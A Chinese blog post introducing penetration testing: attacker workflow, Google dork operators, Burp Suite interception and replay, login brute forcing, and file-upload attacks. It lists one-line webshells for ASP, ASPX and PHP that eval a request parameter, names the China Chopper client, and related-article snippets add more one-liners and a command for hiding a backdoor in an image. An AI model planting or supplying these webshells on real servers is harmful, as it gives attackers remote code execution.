渗透测试的概念和实战

最新推荐文章于 2022-10-22 14:38:55 发布
最新推荐文章于 2022-10-22 14:38:55 发布
阅读量663 收藏 2
点赞数
文章标签: 安全漏洞 web python 正则表达式 软件测试
mtdg
本文链接:https://blog.csdn.net/m0_46266407/article/details/107222174
版权

精选30+云产品,助力企业轻松上云!>>> hot3.png

  • 目录
  • 1. 前言
  • 2. 常见web安全漏洞
  • 3. 思路
  • 3.1渗透测试思路
  • 3.2黑客攻击思路
  • 4. 暴力破解
  • 4.1谷歌黑语法
  • 4.1.1 黑语法inurl:搜索url包含指定字符串
  • 4.1.2 黑语法intitle:搜索网页中的标题名是否包含指定字符串
  • 4.1.3 黑语法intext:搜索网页正文内容是否包含指定字符串
  • 4.2Burpsuite常用功能
  • 4.2.1 拦截
  • 4.2.2抓包
  • 4.2.3改包
  • 4.2.4重放
  • 4.3后台暴力破解
  • 5. 上传木马或漏洞
  • 5.1一句话木马
  • 5.2上传漏洞

1.前言

渗透测试时通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。

2.常见web安全漏洞

up-fad3250342603815255629546ed93f2a247.png

3.思路

3.1渗透测试思路

信息收集->攻击测试

3.2黑客攻击思路

信息收集->攻击测试->提升权限->扩大成果->清除痕迹

4.暴力破解

4.1谷歌黑语法

4.1.1黑语法inurl:搜索url包含指定字符串

up-63f881cd977f9b4d9892a3f4c7be382eb3c.png

4.1.2黑语法intitle:搜索网页中的标题名是否包含指定字符串

up-f6e4abeab12b5b39ebee4e0c38966b67fb9.png

4.1.3黑语法intext:搜索网页正文内容是否包含指定字符串

4.2Burpsuite常用功能

Burpsuite是Java开发的工具,所以需要安装好JDK,版本最好1.8以上

使用流程:

拦截->抓包->改包->重放

4.2.1 拦截

点击options配置代理服务器

up-aede24fab5874c7b18c635673544d17dc30.png

浏览器也要配置,这里使用火狐浏览器,安装插件proxy或者谷歌hackbar

4.2.2抓包

配置好,刷新浏览器就能截取到数据包

up-df2c532af6bd5ca8d0fab37a519b0533d70.png

但此时并没有达到拦截效果,需要开启Intercept,改为ON

up-41c1cc786fefe71ce3c679e84a1f472f000.png

4.2.3改包

刷新浏览器就能截取到数据包,并拦截

up-a1c97d130a6df141f1fe4270527ddfcba52.png

4.2.4重放

重放数据包

up-ac4f5b08caeae62169e6d795ad4efcf211d.png

up-f57616e1cb2b437d6b07d0e187b57ffe9de.png

4.3后台暴力破解

对登陆数据包不存在的验证码、token等一次性验证进行破解。

5.上传木马或漏洞

5.1一句话木马

  • asp:<%eval request(“pass”)%>
  • aspx:<%@Page Language%><?eval(Request.Item[“pass”].” unsafe”);%>
  • php:<?php @eval($_POST[‘pass’];);?>

5.2上传漏洞

软件:中国菜刀,配合木马使用

 

 

拯救世界的派大星
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ASPX一句话***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 627
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句话的经典***吧! <...
史上最全一句话木马
hackzkaq的博客
06-29 7778
目录 PHP //可执行命令一句话 PHP系列 过狗一句话 几个变性的php–过防火墙 过狗效果都不错: 密码-7 ASP asp 一句话 ASP过安全狗一句话 ASPX系列 ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp aspx一句话 JSP 过护卫神的abc123456789原来代码是 把标签修改替换下来 为......
渗透测试基础,初识渗透测试
大河之犬的博客
06-23 3353
1、脚本(asp、php、jsp)3、HTTP协议4、CMS内容管理系统(B/S)5、MD5/加盐(salt)6、肉鸡、抓鸡、DDOS、cc(耗费自己的CPU资源分配代理服务器)7、一句话、小马、大马webshell、提权、后门、跳板、rookit8、源码打包、脱裤、暴库9、嗅探、rookit、社工11、src平台、0day12、事件型漏洞,通用型漏洞13、web服务器、web容器、中间件。
测试渗透的基本概念
nisp_zhangshuai的博客
10-22 1053
违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。经过验证的安全漏洞就可以被利用起来向目标程序发起攻击,但是不同的安全漏洞,攻击机制并不相同,针对不同的安全漏洞需要进一步分析,包括安全漏洞原理、可利用的工具、目标程序检测机制、攻击是否可以绕过防火墙等,制订一个详细精密的攻击计划,这样才能保证测试顺利执行。应对内部专业人员攻击的能力。网站敏感信息:cms指纹信息、WAF、旁站、C段、敏感目录、敏感信息、源码泄露、网站后台信息等;
#资源分享达人# 《Python渗透测试编程技术 方法与实践》_李华峰.zip
08-03
8. **案例研究与实战**:通过真实或模拟的案例,读者可以学习如何将理论知识应用于实际渗透测试项目,提升实战经验。 9. **安全防御与加固**:除了攻击,书还可能讨论如何利用Python进行安全防御,如编写防火墙规则...
30 天渗透测试练习2.pdf
最新发布
10-06
【网络安全渗透测试】是网络安全领域中的一个重要环节,它旨在通过模拟黑客攻击行为,评估和...从基础概念到高级技术,这些资源覆盖了网络安全渗透测试的广泛知识,对于想要在这个领域深入的人来说是非常宝贵的资料。
CobaltStrike4.0渗透测试手册
03-18
1. **Cobalt Strike简介**:介绍Cobalt Strike的基本概念、功能和用途,包括它的组件如 Beacon、Team Server、Launcher等,以及它们在渗透测试中的角色。 2. **安装与配置**:详细解释如何安装Cobalt Strike 4.0,...
网络安全渗透测试技术基础课程
05-29
1. **渗透测试概述**:介绍渗透测试的基本概念、目的和流程,包括道德黑客的定义、渗透测试的合法性和不同类型的渗透测试(如黑盒、白盒和灰盒测试)。 2. **安全基础理论**:讲解网络通信的基础知识,如TCP/IP协议...
[原创]K8一句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY-附件资源
03-02
[原创]K8一句话密码爆破工具{秒破10万} 支持ASP/PHP/ASPX/JSP/CFM/DIY-附件资源
渗透测试学习与实战阶段分析
m0_65606241的博客
05-07 701
初学接触阶段 很多刚接触渗透测试行业的小伙伴当你走出学院大门那一刻,有的时候会感觉到很迷茫,不知道渗透测试学完之后对未来的规划。 据我多年分析哈,得出啦一套自己的思想见解观点。 第一步呢 , 当然是先学习基本的渗透测试知识。 第二步,属于进阶阶段,不断地通过实战去总结在项目过程中做渗透测试哪些内容对我们的帮助最大。 第三步,从简分析,术业专精, ...
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应中心漏洞,凭借挖漏洞月收入过万
什么是渗透测试
weixin_42368489的博客
10-10 9381
渗透测试简介 渗透测试是一种定位计算机系统并可对其成功实施漏洞攻击的方法,是合法且得到授权的行为,目的是为了使这些受测的系统更加安全,通过使用和攻击者相同的工具和技术,发现安全问题,在真正的黑客利用这些漏洞之前实施保护措施。 漏洞评估:检查系统和服务是否存在潜在安全问题的过程 渗透测试:通过执行漏洞利用和概念证明(POC)攻击来证明系统确实存在安全隐患 渗透测试的步骤 侦察(Reconnais...
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
首款企业应急响应中心开发框架 – SRCMS·轻响应
收集盒 Book box
08-23 1414
Security Response Content Management System(简称:SRCMS/轻响应)是一款针对企业应急响应中心开发的模板框架。 近年来黑客攻击频发,企业信息安全已经愈来愈受到重视。企业应急响应中心,一般起着对外发布企业突发安全事件处理动态,作为企业与热心用户以及白帽黑客沟通反馈的平台以及对外发布企业信息安全团队研究成果的重要作用。作为互联网企业安全防护体系中用户
在windows cmd中制作图片一句话
Just for funnnnnnnnnnnn
03-21 2692
在测试网站时如果允许上传图片,可以通过上传一个隐藏后门代码的图片,然后用菜刀连接快速得到webshell。 在windows cmd.exe(windows+R后输入cmd可快速打开)中可以快速制作这种图片: copy source.jpg/b+chopper.php target.jpg 其中source.jpg为原图片,chopper.php为含有后门代码的脚本,target.j...
webshell一句话木马大全
努力是为了让自己更加有方向
04-04 1596
转载:来自WebShell’S Blog,地址:https://www.webshell.cc/2265.html 比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request(“sb”)%> 程序代码 <%execute request(“sb”)%> 程序代码 <%execute(request(“sb”))%> 程序代码 <%execute request(“sb”)%><%’<%
Metasploit渗透测试框架实战指南
Kali渗透测试技术实战是指使用Kali Linux操作系统和Metasploit Framework工具来进行渗透测试的技术实战指导。渗透测试是一种模拟攻击来评估计算机系统或网络安全的方法,目的是为了发现系统中的漏洞和弱点,以便采取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值